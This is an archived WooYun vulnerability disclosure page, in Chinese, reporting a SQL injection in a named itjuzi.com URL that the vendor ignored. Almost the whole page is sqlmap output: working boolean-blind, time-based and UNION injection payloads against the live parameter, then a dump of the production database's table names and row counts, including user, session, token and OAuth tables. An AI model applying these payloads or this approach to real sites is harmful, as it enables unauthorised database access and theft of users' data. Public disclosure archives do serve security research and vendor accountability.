乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-26: 细节已通知厂商并且等待厂商处理中 2015-12-01: 厂商已经主动忽略漏洞,细节向公众公开
http://sh.itjuzi.com/everjob?id=1&type=invsp
sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1) AND 2340=2340 AND (2895=2895&type=invsp Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: id=1) AND (SELECT * FROM (SELECT(SLEEP(5)))ZjqW) AND (1982=1982&type=invsp Type: UNION query Title: Generic UNION query (NULL) - 6 columns Payload: id=1) UNION ALL SELECT NULL,NULL,CONCAT(0x71627a6b71,0x50744e6c4c645a4b476a,0x7170626a71),NULL,NULL,NULL-- &type=invsp---web application technology: PHP 5.4.41back-end DBMS: MySQL >= 5.0.0Database: itjuzi+--------------------------------------+---------+| Table | Entries |+--------------------------------------+---------+| mobile_sessions | 959290 || tbl_search | 359979 || tbl_front_users_groups | 198273 || tbl_front_user | 197714 || ci_sessions | 160444 || spider_news | 149028 || db_company_all | 141976 || tbl_rel_com_with_new_tag | 136607 || tbl_front_user_follow_scope | 100484 || tbl_view_count | 89585 || tbl_rel_api_with_db | 67713 || tbl_front_user_follow_com | 63942 || spider_coms | 60653 || db_company_managers | 59982 || db_manager | 59982 || tbl_rel_com_with_tag | 54334 || click_like | 47998 || tbl_rel_auth_user | 47691 || tbl_oauth | 47617 || tbl_rel_per_with_skills | 39788 || tbl_rel_com_with_mil | 37103 || tbl_com_mile_stone | 36921 || tbl_rel_front_user_goal | 36767 || tbl_contacts_person_connect | 33194 || tbl_contacts_rel_person_with_tag | 33084 || tbl_rel_front_user_skill | 31807 || tbl_rel_com_with_new | 30595 || tbl_new | 30586 || tbl_company | 29873 || tbl_contribution | 28012 || mixed_timeline | 26835 || tbl_rel_com_with_new_cat | 26492 || tbl_rel_com_with_new_sub_cat | 26467 || tbl_com_image | 25840 || tbl_rel_com_with_image | 25101 || tbl_rel_per_with_com | 23195 || tbl_contacts_person | 22054 || tbl_person | 20053 || tbl_contacts_history | 18935 || tbl_contacts_rel_person_with_history | 18929 || user_token | 18786 || tbl_rel_invse_with_invsp_or_invst | 17883 || tbl_rel_invst_with_scope | 17792 || tbl_front_user_follow_circle | 15594 || tbl_commont_star | 15457 || tbl_product | 13179 || tbl_rel_com_with_product | 13179 || tbl_investevent | 12990 || tbl_front_user_follow_investment | 11833 || tbl_clues | 10467 || tbl_search_count_data | 10304 || user_phone_cms | 9662 || tbl_rel_invst_with_state | 7456 || tbl_rel_per_with_education | 7439 || tbl_hunt_invst_action | 7267 || spider_news_2015 | 7048 || tbl_rel_per_with_ever_job | 6565 || tbl_claim | 6384 || search_total | 5461 || tbl_maimai_tag | 5440 || new_comment | 5364 || today_product | 5002 || addr_list | 4223 || tbl_maimai_relation | 3948 || tbl_testpage | 3890 || tbl_app_ddashi_company | 3820 || tbl_commont | 3679 || tbl_front_user_follow_investor | 3574 || tbl_user_center_count | 3502 || tbl_front_user_follow_album | 3134 || tbl_album_company | 3080 || tbl_coolchuan_relation_with_com | 2683 || tbl_rel_hunt_invst_with_scope | 2427 || user_msg | 2348 || tbl_rel_com_with_scale | 2324 || talk_hot_num | 2185 || tbl_investment | 2153 || tal_rel_archive_cat_with_company | 2040 || tbl_rel_invst_with_invsp | 1701 || tbl_activity_mem | 1659 || tbl_investor | 1602 || talk | 1571 || today_smtp_subscriber | 1275 || tbl_merger | 1162 || tbl_com_credit_basic | 1039 || spider_invest | 972 || tbl_front_user_follow_experience | 961 || tbl_rel_hunt_invst_with_round | 865 || tbl_new_tag | 789 || tbl_rel_new_cat_with_new_tag | 772 || tbl_project_tag | 666 || tbl_per_ever_job | 617 || tbl_invite_code | 572 || tbl_per_education | 521 || spider_news_delay | 518 || tbl_rel_hunt_invst_with_currency | 454 || user_connect | 420 || rand_name | 401 || tbl_invst_address | 372 || today_user_follow_album | 349 || tbl_com_tag | 342 || tbl_rel_com_tag_with_category | 325 || tbl_hunt_invst_info | 306 || today_album_company | 292 || tbl_front_user_follow_archive | 274 || tbl_album | 250 || ci_sessions_3 | 231 || comment_replay | 225 || tbl_new_cat | 200 || spider_news_used | 199 || tal_rel_archive_with_cat | 166 || tbl_company_chief | 151 || tbl_hunt_follow_project | 140 || tbl_project_team | 140 || shanghai_article | 127 || circle_topic | 124 || tbl_project_detail | 117 || my_follow | 113 || tbl_rel_project_with_tag | 100 || tbl_contacts_person_tag | 92 || tbl_activity | 86 || tbl_new_pingwest | 85 || microdata | 78 || feed_back | 70 || tbl_rel_com_with_similar | 54 || tbl_project | 49 || tbl_project_contact | 49 || correct_company_by_user | 47 || user_verrify | 39 || tbl_hunt_user_submit | 38 || users_groups | 38 || tbl_investor_role | 37 || users | 37 || tbl_report | 36 || tbl_invst_news | 34 || today_album | 32 || user_add_custom | 30 || smtp_week_today | 29 || birth_first_year_msg | 25 || tbl_com_change | 25 || feedback_msg | 24 || tbl_invst_image | 23 || tbl_activity_summary | 22 || tbl_com_tag_category | 22 || tbl_com_scope | 21 || tbl_rel_activity_with_show | 21 || tbl_rel_invst_with_image | 21 || tbl_investment_scope | 20 || tbl_per_skills | 18 || tbl_front_user_skill | 17 || tal_archive | 15 || tbl_activity_jushuo | 14 || tbl_com_fund_status | 14 || tbl_new_type | 14 || tbl_investevent_round | 12 || tbl_commont_replay | 11 || circle | 10 || shanghai_activity_list | 10 || topic_type | 10 || tbl_front_user_goal | 9 || tbl_investment_state | 9 || tbl_merger_identity | 9 || tbl_product_type | 9 || tbl_com_listed | 8 || tbl_investevent_currency | 8 || tbl_invst_new_type | 8 || tbl_activity_report | 7 || tbl_investevent_assess_money | 7 || my_inform | 5 || tbl_contribution_role | 5 || tbl_investevent_similar_money | 5 || tbl_com_credit_partners | 4 || tbl_com_fund_needs | 4 || tbl_com_stage | 4 || tbl_com_status | 4 || tbl_front_groups | 4 || tbl_report_type | 4 || groups | 3 || tbl_com_credit_employees | 3 || tbl_front_user_role | 3 || tbl_hunt_service | 3 || tbl_hunt_service_type | 3 || tbl_wechat_img | 3 || site_base | 1 || tbl_invst_capital | 1 || tbl_invst_mile_stone | 1 || user_update_new_version | 1 |+--------------------------------------+---------+
危害等级:无影响厂商忽略
忽略时间:2015-12-01 15:50
漏洞Rank:4 (WooYun评价)
暂无
